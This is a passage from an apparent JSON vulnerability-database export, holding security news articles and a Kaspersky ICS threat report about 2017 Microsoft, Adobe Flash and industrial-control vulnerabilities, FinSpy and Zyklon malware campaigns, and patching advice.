allows attackers to \u201ctake control of an affected system.\u201d From there, attackers can install programs and view, change, or delete data, or create new accounts with full user rights.\n\n\u201cTo exploit the vulnerability, an attacker would first need to convince the user to open a malicious document or 
application,\u201d Microsoft said Tuesday. The bulletin doesn\u2019t give any indication of how widespread the attacks are but says the vulnerability is \u201cimportant\u201d and was found by security firm FireEye.\n\nAccording to FireEye, the vulnerability is being actively exploited to distribute the FINSPY spyware, delivered via malicious Microsoft Office RTF files. Researchers there said the zero day leverages a SOAP WSDL parser code injection vulnerability.\n\n\u201cFireEye analyzed a Microsoft Word document where attackers used the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands,\u201d Genwei Jiang, Ben Read and Tom Bennett, researchers with the firm, wrote in a technical analysis of the [vulnerability also posted Tuesday](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>).\n\nThis is the second zero-day vulnerability used to distribute FINSPY uncovered by FireEye in 2017. The first [was found in April](<https://threatpost.com/office-zero-day-delivering-finspy-spyware-to-victims-in-russia/124939/>) and was part of an unidentified state-sponsored attack targeting victims in Russia.\n\n\u201cThese exposures demonstrate the significant resources available to \u2018lawful intercept\u2019 companies and their customers. 
Furthermore, FINSPY has been sold to multiple clients, suggesting the vulnerability was being used against other targets,\u201d the firm said.\n\nOn Tuesday, Microsoft also publicly disclosed information pertaining to a patch for a vulnerability that is part of a collection [of exploits known as BlueBorne](<https://threatpost.com/wireless-blueborne-attacks-target-billions-of-bluetooth-devices/127921/>), discovered and publicly revealed Tuesday by security firm Armis.\n\nThe BlueBorne-related bug ([CVE-2017-8628](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)), identified as a Bluetooth driver spoofing vulnerability, could allow an attacker to successfully perform a man-in-the-middle attack and force a user\u2019s computer to unknowingly route traffic through the attacker\u2019s computer, according to Microsoft.\n\nThe attack requires the target\u2019s device to have Bluetooth enabled and the adversary to be within proximity of the device. \u201cThe attacker can then initiate a Bluetooth connection to the target computer without the user\u2019s knowledge\u201d and carry out the attack, according to Microsoft.\n\n\u201cYou don\u2019t often see patches to fix issues that depend on physical proximity, but Bluetooth attacks are definitely an exception,\u201d the [Zero Day Initiative\u2019s (ZDI) Dustin Childs said in an analysis of the vulnerability](<https://www.zerodayinitiative.com/blog/2017/9/12/the-september-2017-security-update-review>). \u201cFor the Windows OS, code execution over Bluetooth cannot directly occur with this bug. Still, the MiTM attack is still severe enough to warrant extra attention.\u201d\n\nMicrosoft also patched a critical NetBIOS remote code execution vulnerability ([CVE-2017-0161](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0161>)). The flaw exists in NetBT Session Services when NetBT fails to maintain certain sequencing requirements, Microsoft said. 
\u201cTo exploit the vulnerability, an attacker needs to be able to send specially crafted NetBT Session Service packets to an impacted system,\u201d according to the bulletin.\n\nZDI points out that NetBIOS isn\u2019t a routable protocol, so the impact is limited. \u201cThe bad news is that this is practically wormable within a LAN. This could also impact multiple virtual clients if the guest OSes all connect to the same (virtual) LAN,\u201d according to ZDI.\n\nIn total, Microsoft released 81 security patches as part of its September Patch Tuesday impacting Windows, Internet Explorer, Edge, Exchange, .NET Framework, Office and Hyper-V. Twenty-six of the vulnerabilities are critical, 53 important and two are rated moderate in severity. Cutting the numbers even further, 38 of the vulnerabilities impacted Windows and 22 are tied to Microsoft\u2019s Edge and IE browsers.\n\n\u201cMany of these vulnerabilities involve the Scripting Engine, which can impact both browsers and Microsoft Office, and should be considered for prioritizing for workstation-type systems that use email and access the internet via a browser,\u201d according [to analysis by](<https://blog.qualys.com/laws-of-vulnerabilities/2017/09/12/september-patch-tuesday-27-critical-vulnerabilities-from-microsoft-plus-critical-adobe-patches>) Jimmy Graham, director of product management, vulnerability management for security firm Qualys.\n", "modified": "2017-09-12T20:00:57", "published": "2017-09-12T15:59:40", "id": "THREATPOST:D1D63DCBBB39C340EEEDB2544F4C7DB3", "href": "https://threatpost.com/microsoft-patches-office-zero-day-vulnerability/127946/", "type": "threatpost", "title": "Microsoft Patches .NET Zero Day Vulnerability in September Update", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "krebs": [{"lastseen": "2017-09-22T08:39:05", "bulletinFamily": "blog", "cvelist": ["CVE-2017-8628", "CVE-2017-8759"], "description": "**Adobe** and **Microsoft** 
both on Tuesday released patches to plug critical security vulnerabilities in their products. Microsoft's patch bundles fix close to 80 separate security problems in various versions of its **Windows** operating system and related software -- including two vulnerabilities that already are being exploited in active attacks. Adobe's new version of its **Flash Player** software tackles two flaws that malware or attackers could use to seize remote control over vulnerable computers with no help from users.\n\n\n\nOf the two [zero-day flaws](<https://en.wikipedia.org/wiki/Zero-day_\\(computing\\)>) being fixed this week, the one in Microsoft's ubiquitous **.NET Framework** ([CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>)) is perhaps the most concerning. Despite this flaw being actively exploited, it is somehow labeled by Microsoft as \"important\" rather than \"critical\" -- the latter being the most dire designation.\n\nMore than two dozen flaws Microsoft remedied with this patch batch come with a \"critical\" warning, which means they could be exploited without any assistance from Windows users -- save for perhaps browsing to a hacked or malicious Web site.\n\nRegular readers here probably recall that I've often recommended installing .NET updates separately from any remaining Windows updates, mainly because in past instances in which I've experienced problems installing Windows updates, a .NET patch was usually involved.\n\nFor the most part, Microsoft now bundles all security updates together in one big patch ball for regular home users -- no longer letting people choose which patches to install. One exception is patches for the .NET Framework, and I stand by my recommendation to install the patch roll-ups separately, reboot, and then tackle the .NET updates. 
Your mileage may vary.\n\nAnother vulnerability Microsoft fixed addresses \"[BlueBorne](<https://www.google.com/search?q=BlueBorne&tbm=nws&source=univ&tbo=u&sa=X&ved=0ahUKEwjTxKXsxaLWAhVB34MKHU-hBgUQt8YBCDcoAQ&biw=1536&bih=856>)\" ([CVE-2017-8628](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)), which is a flaw in the Bluetooth wireless data transmission standard that attackers could use to snarf data from Bluetooth-enabled devices that are physically nearby and with Bluetooth turned on.\n\nFor more on this month's Patch Tuesday from Microsoft, check out Microsoft's [security update guide](<https://portal.msrc.microsoft.com/en-us/security-guidance>), as well as [this blog](<https://www.ivanti.com/blog/september-patch-tuesday-2/>) from **Ivanti** (formerly **Shavlik**).\n\nAdobe's newest Flash version -- _v. 27.0.0.130_ for Windows, Mac and Linux systems -- corrects [two critical bugs in Flash](<https://helpx.adobe.com/security/products/flash-player/apsb17-28.html>). For those of you who still have and want Adobe Flash Player installed in a browser, it\u2019s time to update and/or restart your browser.\n\nWindows users who browse the Web with anything other than Internet Explorer may need to apply the Flash patch twice, once with IE and again using the alternative browser (e.g., Firefox or Opera).\n\nChrome and IE should auto-install the latest Flash version on browser restart (users may need to manually check for updates and/or restart the browser to get the latest Flash version). Chrome users may need to restart the browser to install or automatically download the latest version. When in doubt, click the vertical three dot icon to the right of the URL bar, select \u201cHelp,\u201d then \u201cAbout Chrome\u201d: If there is an update available, Chrome should install it then. 
Chrome will replace that three dot icon with an up-arrow inside of a circle when updates are ready to install.\n\nBetter yet, consider removing or at least hobbling Flash Player, which is [a perennial target of malware attacks](<https://krebsonsecurity.com/wp-content/uploads/2017/08/flashflaws-ek.png>). Most sites have moved away from requiring Flash, and Adobe itself [is sunsetting this product](<https://krebsonsecurity.com/2017/08/flash-player-is-dead-long-live-flash-player/>) (albeit not for another two years).\n\nWindows users can get rid of Flash through the Add/Remove Programs menu, unless they're using Chrome, which bundles its own version of Flash Player. To get to the Flash settings page, type or cut and paste \"chrome://settings/content\" into the address bar, and click on the Flash result.", "modified": "2017-09-13T16:42:30", "published": "2017-09-13T16:42:30", "id": "KREBS:F0163956314C713411403F8497E4F9A4", "href": "https://krebsonsecurity.com/2017/09/adobe-microsoft-plug-critical-security-holes/", "title": "Adobe, Microsoft Plug Critical Security Holes", "type": "krebs", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T10:06:54", "bulletinFamily": "info", "cvelist": ["CVE-2017-11292", "CVE-2017-8759"], "description": "[](<https://4.bp.blogspot.com/-LuHe8r34EGA/WeTTGl-43GI/AAAAAAAAuZs/o112IbvjTJESNEg8li8Xr0V3AEMG3uSmgCLcBGAs/s1600/flash-player-zero-day-exploit.png>)\n\n**[FinSpy](<https://thehackernews.com/2014/08/company-that-sells-finfisher-spying.html>)**\u2014the infamous surveillance malware is back and infecting high-profile targets using a new Adobe Flash zero-day exploit delivered through Microsoft Office documents. 
\n \nSecurity researchers from Kaspersky Lab have [discovered](<https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/>) a new zero-day remote code execution vulnerability in Adobe Flash, which was being actively exploited in the wild by a group of advanced persistent threat actors known as **BlackOasis**. \n \nThe critical type confusion vulnerability, tracked as **CVE-2017-11292**, could lead to code execution and affects Flash Player 21.0.0.226 for major operating systems including Windows, Macintosh, Linux and Chrome OS. \n \nResearchers say BlackOasis is the same group of attackers that was also responsible for exploiting another zero-day vulnerability ([CVE-2017-8759](<https://thehackernews.com/2017/09/windows-zero-day-spyware.html>)) discovered by FireEye researchers in September 2017. \n \nAlso, the final FinSpy payload in the current attacks exploiting the Flash zero-day (CVE-2017-11292) shares the same command and control (C&C) server as the payload used with CVE-2017-8759 (a Windows [.NET Framework remote code execution](<https://thehackernews.com/2017/09/windows-zero-day-spyware.html>) flaw). \n \nSo far BlackOasis has targeted victims in various countries including Russia, Iraq, Afghanistan, Nigeria, Libya, Jordan, Tunisia, Saudi Arabia, Iran, the Netherlands, Bahrain, United Kingdom and Angola. \n \nThe newly reported Flash zero-day exploit is at least the fifth zero-day the BlackOasis group has exploited since June 2015. \n \nThe zero-day exploit is delivered through Microsoft Office documents, particularly Word, attached to a spam email; the Word file embeds an ActiveX object that contains the Flash exploit. \n \nThe exploit deploys the FinSpy commercial malware as the attack's final payload. 
\n\n\n> \"The Flash object contains an ActionScript which is responsible for extracting the exploit using a custom packer seen in other FinSpy exploits,\" the Kaspersky Labs researchers say.\n\nFinSpy is a highly secret surveillance tool that has previously been associated with Gamma Group, a British company that legally sells surveillance and espionage software to government agencies across the world. \n \nFinSpy, also known as **FinFisher**, has extensive spying capabilities on an infected system, including secretly conducting live surveillance by turning ON its webcams and microphones, recording everything the victim types on the keyboard, intercepting Skype calls, and exfiltration of files. \n \nTo get into a target's system, FinSpy usually makes use of various attack vectors, including spear phishing, manual installation with physical access to the affected device, zero-day exploits, and watering hole attacks. \n\n\n> \"The attack using the recently discovered zero-day exploit is the third time this year we have seen FinSpy distribution through exploits to zero-day vulnerabilities,\" said Anton Ivanov, lead malware analyst at Kaspersky Lab.\n\n> \"Previously, actors deploying this malware abused critical issues in Microsoft Word and Adobe products. We believe the number of attacks relying on FinSpy software, supported by zero day exploits such as the one described here, will continue to grow.\"\n\nKaspersky Lab reported the vulnerability to Adobe, and the company has [addressed](<https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>) the vulnerability with the release of Adobe Flash Player versions 27.0.0.159 and 27.0.0.130. \n \nJust last month, ESET researchers discovered legitimate downloads of several popular apps like WhatsApp, Skype, VLC Player and WinRAR (reportedly [compromised at the ISP level](<https://thehackernews.com/2017/09/gamma-finfisher-hacking-tool.html>)) that were also distributing FinSpy. 
\n \nSo, businesses and government organizations around the world are strongly advised to install the update from Adobe as soon as possible. \n \nMicrosoft will also likely be releasing a security update to patch the Flash Player components used by its products.\n", "modified": "2017-10-16T15:53:54", "published": "2017-10-16T04:52:00", "id": "THN:5AD427A8B33BDFD2EE553727C6CE4EE0", "href": "https://thehackernews.com/2017/10/flash-player-zero-day.html", "type": "thn", "title": "Hackers Use New Flash Zero-Day Exploit to Distribute FinFisher Spyware", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:16", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2017-8759"], "description": "[](<https://3.bp.blogspot.com/-yiz5vmLsg4o/Wl-U8988sCI/AAAAAAAAvf4/MyZ8AtDGSl88TrrW406iMHvPHLdbNXf_ACLcBGAs/s1600/microsoft-office-malware.png>)\n\nSecurity researchers have spotted a new malware campaign in the wild that spreads an advanced botnet malware by leveraging at least three recently disclosed vulnerabilities in Microsoft Office. \n \nDubbed **Zyklon**, the fully-featured malware has resurfaced after almost two years and is primarily found targeting telecommunications, insurance and financial services. \n \nActive since early 2016, Zyklon is an HTTP botnet malware that communicates with its command-and-control servers over the Tor anonymising network and allows attackers to remotely steal keystroke logs and sensitive data, such as passwords stored in web browsers and email clients. \n \nZyklon malware is also capable of executing additional plugins, including secretly using infected systems for DDoS attacks and cryptocurrency mining. \n \nDifferent versions of the Zyklon malware have previously been found advertised on a popular underground marketplace for $75 (normal build) and $125 (Tor-enabled build). 
\n \nAccording to a recently published [report](<https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html>) by FireEye, the attackers behind the campaign are leveraging the following three vulnerabilities in Microsoft Office to execute a PowerShell script on the targeted computers, which downloads the final payload from the C&C server. \n \n**1) .NET Framework RCE Vulnerability** ([CVE-2017-8759](<https://thehackernews.com/2017/09/windows-zero-day-spyware.html>))\u2014this remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input, allowing an attacker to take control of an affected system by tricking victims into opening a specially crafted malicious document file sent over an email. Microsoft already released a security patch for this flaw in its September updates. \n \n**2) Microsoft Office RCE Vulnerability** ([CVE-2017-11882](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>))\u2014a 17-year-old memory corruption flaw, which Microsoft patched in its [November update](<https://thehackernews.com/2017/11/microsoft-patch-tuesday.html>), that allows a remote attacker to execute malicious code on the targeted system without requiring any user interaction beyond opening a malicious document. \n \n**3) Dynamic Data Exchange Protocol** ([DDE Exploit](<https://thehackernews.com/2017/10/ms-office-dde-malware.html>))\u2014this technique allows attackers to leverage a built-in feature of Microsoft Office, called DDE, to [perform code execution](<https://thehackernews.com/2017/11/apt28-office-dde-malware.html>) on the targeted device without requiring macros to be enabled or memory corruption. \n \nAs explained by the researchers, attackers are actively exploiting these three vulnerabilities to deliver Zyklon malware using spear phishing emails, which typically arrive with an attached ZIP file containing a malicious Office doc file. 
\n \nOnce opened, the malicious doc file equipped with one of these vulnerabilities immediately runs a PowerShell script, which eventually downloads the final payload, i.e., Zyklon HTTP malware, onto the infected computer. \n\n\n> \"In all these techniques, the same domain is used to download the next level payload (Pause.ps1), which is another PowerShell script that is Base64 encoded,\" the FireEye researchers said.\n\n> \"The Pause.ps1 script is responsible for resolving the APIs required for code injection. It also contains the injectable shellcode.\"\n\n> \"The injected code is responsible for downloading the final payload from the server. The final stage payload is a PE executable compiled with .Net framework.\"\n\nInterestingly, the PowerShell script connects to a dotless IP address (example: **http://3627732942**) to download the final payload. \n \n**What is a Dotless IP Address?** If you are unaware, dotless IP addresses, sometimes referred to as 'Decimal Addresses,' are the decimal values of IPv4 addresses (which are normally represented in dotted-quad notation). Almost all modern web browsers resolve a decimal IP address to its equivalent IPv4 address when it is opened with \"http://\" in front of the decimal value. \n \nFor example, Google's IP address 216.58.207.206 can also be represented as http://3627732942 in decimal. \n \nThe best way to protect yourself and your organisation from such malware attacks is always to be suspicious of any uninvited document sent via email and never to click on links inside those documents unless you have adequately verified the source. 
\n \nMost importantly, always keep your software and systems up-to-date, as threat actors incorporate recently discovered, but patched, vulnerabilities in popular software\u2014Microsoft Office, in this case\u2014to increase the potential for successful infections.\n", "modified": "2018-01-17T18:25:22", "published": "2018-01-17T07:25:00", "id": "THN:C21D17F1D92C12B031AB9C761BBD004A", "href": "https://thehackernews.com/2018/01/microsoft-office-malware.html", "type": "thn", "title": "Hackers Exploiting Three Microsoft Office Flaws to Spread Zyklon Malware", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:55", "bulletinFamily": "info", "cvelist": ["CVE-2017-8746", "CVE-2017-9417", "CVE-2017-8759", "CVE-2017-8723"], "description": "[](<https://3.bp.blogspot.com/-Y6iaD1KFbD0/WbkO3mrT3oI/AAAAAAAAAIs/MIeMugyFZtMKjyA5SeEgQRSs65OuO6eNQCLcBGAs/s1600/windows-0day-exploit.png>)\n\nGet ready to install a fairly large batch of security patches onto your Windows computers. \n \nAs part of its [September Patch Tuesday](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/5984735e-f651-e711-80dd-000d3a32fc99>), Microsoft has released a large batch of security updates to patch a total of 81 CVE-listed vulnerabilities, on all supported versions of Windows and other MS products. \n \nThe latest security update addresses 27 critical and 54 important vulnerabilities in severity, of which 38 vulnerabilities are impacting Windows, 39 could lead to Remote Code Execution (RCE). 
\n \nAffected Microsoft products include: \n \n\n\n * Internet Explorer\n * Microsoft Edge\n * Microsoft Windows\n * .NET Framework\n * Skype for Business and Lync\n * Microsoft Exchange Server\n * Microsoft Office, Services and Web Apps\n * [Adobe Flash Player](<https://thehackernews.com/2017/09/adobe-security-patch.html>)\n \n \n\n\n### .NET 0-Day Flaw Under Active Attack\n\n \nAccording to the company, four of the patched vulnerabilities are publicly known, one of which has already been actively exploited by the attackers in the wild. \n \nHere's the list of publicly known flaws and their impact: \n \n**Windows .NET Framework RCE (CVE-2017-8759)\u2014**A zero-day flaw, [discovered](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>) by researchers at cybersecurity firm FireEye and privately reported to Microsoft, resides in the way Microsoft .NET Framework processes untrusted input data. \n \nMicrosoft says the flaw could allow an attacker to take control of an affected system, install programs, view, change, or delete data by tricking victims into opening a specially crafted document or application sent over an email. \n \nThe flaw could even allow an attacker to create new accounts with full user rights. Therefore users with fewer user rights on the system are less impacted than users who operate with admin rights. \n \nAccording to [FireEye](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>), this zero-day flaw has actively been exploited by a well-funded cyber espionage group to deliver [FinFisher Spyware](<https://thehackernews.com/2014/08/company-that-sells-finfisher-spying.html>) (FinSpy) to a Russian-speaking \"entity\" via malicious Microsoft Office RTF files in July this year. 
\n \nFinSpy is highly secretive surveillance software that has previously been associated with British company Gamma Group, a company that legally sells surveillance and espionage software to government agencies. \n \nOnce a system is infected, FinSpy can perform a large number of secret tasks on the victim's computer, including secretly monitoring the computer by turning ON webcams, recording everything the user types with a keylogger, intercepting Skype calls, copying files, and much more. \n \n\"The [new variant of FINSPY]...leverages heavily obfuscated code that employs a built-in virtual machine \u2013 among other anti-analysis techniques \u2013 to make reversing more difficult,\" researchers at FireEye said. \n \n\"As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames.\" \n \n\n\n### Three Publicly Disclosed Vulnerabilities\n\n \nThe remaining three publicly known vulnerabilities affecting the Windows 10 platform include: \n \n\n\n * **Device Guard Security Feature Bypass Vulnerability (CVE-2017-8746):** This flaw could allow an attacker to inject malicious code into a Windows PowerShell session by bypassing the Device Guard Code Integrity policy.\n * **Microsoft Edge Security Feature Bypass Vulnerability (CVE-2017-8723):** This flaw resides in Edge where the Content Security Policy (CSP) fails to properly validate certain specially crafted documents, allowing attackers to trick users into visiting a website hosting malware.\n * **Broadcom BCM43xx Remote Code Execution Vulnerability (CVE-2017-9417):** This flaw exists in the Broadcom chipset in HoloLens, which could be exploited by attackers to send a specially crafted WiFi packet, enabling them to install programs, view, change, or delete data, even create new accounts with full admin rights.\n \n\n\n### BlueBorne 
Attack: Another Reason to Install Patches Immediately\n\n \nAlso, the recently disclosed Bluetooth vulnerabilities known as \"[BlueBorne](<https://thehackernews.com/2017/09/blueborne-bluetooth-hacking.html>)\" (which affected more than 5 million Bluetooth-enabled devices, including Windows) were silently patched by Microsoft in July, but details of the flaw have only been released now. \n \nBlueBorne is a series of flaws in the implementation of Bluetooth that could allow attackers to take over Bluetooth-enabled devices, spread malware, or even establish a \"man-in-the-middle\" connection to gain access to devices' critical data and networks without requiring any victim interaction. \n \nSo, users have another important reason to apply the September security patches as soon as possible in order to keep hackers and cyber criminals from taking control of their computers. \n \nOther flaws patched this month include five information disclosure flaws and one denial of service flaw in Windows Hyper-V, two cross-site scripting (XSS) flaws in SharePoint, as well as four memory corruption and two remote code execution vulnerabilities in MS Office. \n \nTo install security updates, simply head to Settings \u2192 Update & security \u2192 Windows Update \u2192 Check for updates, or you can install the updates manually. 
\n \n\n", "modified": "2017-09-13T11:09:52", "published": "2017-09-13T00:09:00", "id": "THN:5133F80C8A11FE7678A971A326DDA682", "href": "https://thehackernews.com/2017/09/windows-zero-day-spyware.html", "type": "thn", "title": "Immediately Patch Windows 0-Day Flaw That's Being Used to Spread Spyware", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2018-03-30T15:53:03", "bulletinFamily": "blog", "cvelist": ["CVE-2014-8361", "CVE-2017-8759"], "description": "\n\n_For many years, Kaspersky Lab experts have been uncovering and researching cyberthreats that target a variety of information systems \u2013 those of commercial and government organizations, banks, telecoms operators, industrial enterprises, and individual users. In this report, Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (_[_Kaspersky Lab ICS CERT_](<https://ics-cert.kaspersky.com/>)_) publishes the findings of its research on the threat landscape for industrial automation systems conducted during the second half of 2017. _\n\n_The main objective of these publications is to provide information support to global and local incident response teams, enterprise information security staff and researchers in the area of industrial facility security._\n\n## Overview of ICS vulnerabilities identified in 2017\n\n_The analysis of vulnerabilities was performed based on vendor advisories, publicly available information from open vulnerability databases (ICS-CERT, CVE, Siemens Product CERT), as well as the results of Kaspersky Lab ICS CERT's own research. 
_Vulnerability data published on the [ICS-CERT](<https://ics-cert.us-cert.gov/>) website in 2017 was used to create statistical diagrams._

### Vulnerabilities in various ICS components

#### Number of vulnerabilities identified

In 2017, the total number of vulnerabilities identified in different ICS components and published on the [ICS-CERT](<https://ics-cert.us-cert.gov/>) website was 322. This includes vulnerabilities identified in general-purpose software and in network protocols that are also relevant to industrial software and equipment. These vulnerabilities are discussed separately in this report.

#### Analysis by Industry

The largest number of vulnerabilities affect industrial control systems in the energy sector (178), manufacturing processes at various enterprises (164), water supply (97) and transportation (74).

[Figure](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130415/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-1.png>)

_Number of vulnerable products used in different industries (according to [ICS-CERT](<https://ics-cert.us-cert.gov/>) classification), vulnerabilities published in 2017_

#### Severity levels of the vulnerabilities identified

More than half (194) of the vulnerabilities identified in ICS systems were assigned [CVSS v.3.0](<https://www.first.org/cvss>) base scores of 7 or higher, corresponding to a high or critical level of risk.

_Table 1 – Distribution of published vulnerabilities by risk level_

| Severity score | 9 to 10 (critical) | 7 to 8.9 (high) | 4 to 6.9 (medium) | 0 to 3.9 (low) |
|---|---|---|---|---|
| Number of vulnerabilities | 60 | 134 | 127 | 1 |

The highest severity score of 10 was assigned to vulnerabilities identified in the following products:

 * [iniNet Solutions GmbH SCADA Webserver](<https://ics-cert.us-cert.gov/advisories/ICSA-17-264-04>),
 * [Westermo MRD-305-DIN, MRD-315, MRD-355, and MRD-455](<https://ics-cert.us-cert.gov/advisories/ICSA-17-236-01>),
 * [Hikvision Cameras](<https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01>),
 * [Sierra Wireless AirLink Raven XE and XT](<https://ics-cert.us-cert.gov/advisories/ICSA-17-115-02>),
 * [Schneider Electric Modicon M221 PLCs and SoMachine Basic](<https://ics-cert.us-cert.gov/advisories/ICSA-17-103-02A>),
 * [BINOM3 Electric Power Quality Meter](<https://ics-cert.us-cert.gov/advisories/ICSA-17-031-01A>),
 * [Carlo Gavazzi VMU-C EM and VMU-C PV](<https://ics-cert.us-cert.gov/advisories/ICSA-17-012-03>).

All vulnerabilities that were assigned the severity rating of 10 have much in common: they have to do with authentication issues, can be exploited remotely and are easy to exploit.

In addition, the highest severity rating was assigned to a vulnerability in the [Modicon Modbus Protocol](<https://ics-cert.us-cert.gov/advisories/ICSA-17-101-01>), which is discussed below.

It should be noted that the CVSS base score does not account for the aspects of security that are specific to industrial automation systems or for the distinctive characteristics of each organization's industrial processes.
This is why, when assessing the severity of a vulnerability, we recommend keeping in mind, in addition to the CVSS score, the possible consequences of its exploitation, such as the non-availability or limited availability of ICS functionality that affects the continuity of the industrial process.

#### Types of vulnerabilities identified

The most common types of vulnerabilities are buffer overflows (Stack-Based Buffer Overflow, Heap-Based Buffer Overflow) and improper authentication (Improper Authentication).

At the same time, 23% of all vulnerabilities identified are web-related (Injection, Path Traversal, Cross-Site Request Forgery (CSRF), Cross-Site Scripting) and 21% are associated with authentication issues (Improper Authentication, Authentication Bypass, Missing Authentication for Critical Function) and with access control problems (Access Control, Incorrect Default Permissions, Improper Privilege Management, Credentials Management).

[Figure](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130422/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-2.png>)

_Most common vulnerability types_

Exploitation of vulnerabilities in various ICS components by attackers can lead to arbitrary code execution, unauthorized control of industrial equipment and denial of service (DoS) of that equipment.
Importantly, most vulnerabilities (265) can be exploited remotely without authentication, and exploiting them does not require the attacker to have any specialized knowledge or superior skills.

Exploits have been published for 17 vulnerabilities, increasing the risk of their exploitation for malicious purposes.

#### Vulnerable ICS components

The largest number of vulnerabilities were identified in:

 * SCADA/HMI components (88),
 * networking devices designed for industrial environments (66),
 * PLCs (52),
 * and engineering software (52).

Vulnerable components also include protection relays, emergency shutdown systems, environmental monitoring systems and industrial video surveillance systems.

[Figure](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130429/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-3.png>)

_Distribution of vulnerabilities identified by ICS components_

### Vulnerabilities in industrial protocols

An important part of ICS software security research in 2017 was identifying serious vulnerabilities in implementations of industrial protocols. Specifically, vulnerabilities were identified in the [implementation of the Modbus Protocol in Modicon series controllers](<https://ics-cert.us-cert.gov/advisories/ICSA-17-101-01>) (that vulnerability was assigned a CVSS v. 3 base score of 10), as well as in [implementations of the OPC UA protocol stack](<https://ics-cert.us-cert.gov/advisories/ICSA-17-243-01B>) and in an implementation of the [PROFINET Discovery and Configuration Protocol](<https://ics-cert.us-cert.gov/advisories/ICSA-17-129-01H>).
The security issues identified affect entire product families.

### Impact of vulnerabilities in 'traditional' technologies on industrial systems

In addition to ICS-specific vulnerabilities, a number of serious flaws were identified in H2 2017 in software platforms and network protocols that can be exploited to attack industrial systems.

The vulnerabilities in the WPA2 protocol unexpectedly turned out to be relevant to industrial solutions. They were found to [affect](<https://ics-cert.kaspersky.com/news/2017/11/15/ics-krack/>) equipment from several vendors, including Cisco, Rockwell Automation, Sierra Wireless, ABB and Siemens. Industrial control systems were also affected by multiple vulnerabilities in [the Dnsmasq DNS server](<https://ics-cert.kaspersky.com/news/2017/12/05/dnsmasq/>), [Java Runtime Environment](<https://ics-cert.us-cert.gov/advisories/ICSA-17-213-02>), [Oracle Java SE](<https://ics-cert.us-cert.gov/advisories/ICSA-17-262-01>), and [Cisco IOS and IOS XE](<https://ics-cert.us-cert.gov/advisories/ICSA-17-094-04>).

Vulnerabilities in Intel products can also affect the security of industrial equipment. In the second half of 2017, [information on several vulnerabilities in Intel products](<https://ics-cert.kaspersky.com/news/2017/11/24/intel-updates/>) (ME, SPS and TXE) was published. These vulnerabilities mainly affect SCADA server hardware and industrial computers that use vulnerable CPUs. These include, for example, Automation PC 910 by B&R, Nuvo-5000 by Neousys and the GE Automation RXi2-XP product line. As a rule, vendors do not consider it necessary to release public advisories on vulnerabilities of this type (derived from using third-party technologies). There are, however, some positive exceptions. For example, Siemens AG has released [an advisory](<https://ics-cert.kaspersky.com/news/2018/03/01/siemens-intel/>) stating that these vulnerabilities affect a range of the company's products.
Earlier, the company published [information](<https://cert-portal.siemens.com/productcert/pdf/ssa-874235.pdf>) about similar vulnerabilities in Intel technologies affecting its products.

### IoT device vulnerabilities

2017 was marked by a growing number of vulnerabilities being identified in internet of things (IoT) devices. As a consequence, such vulnerabilities were increasingly often exploited to create botnets. The activity of three new botnets was uncovered in the last two months of 2017 alone. These included the [Reaper botnet](<https://ics-cert.kaspersky.com/news/2017/11/09/reaper/>) and new Mirai variants, including the [Satori botnet](<https://ics-cert.kaspersky.com/news/2017/12/14/satori/>).

Multiple vulnerabilities were identified in [Dlink 850L routers](<https://blogs.securiteam.com/index.php/archives/3364>), [WIFICAM wireless IP cameras](<https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html>), [Vacron network video recorders](<https://blogs.securiteam.com/index.php/archives/3445>) and other devices.

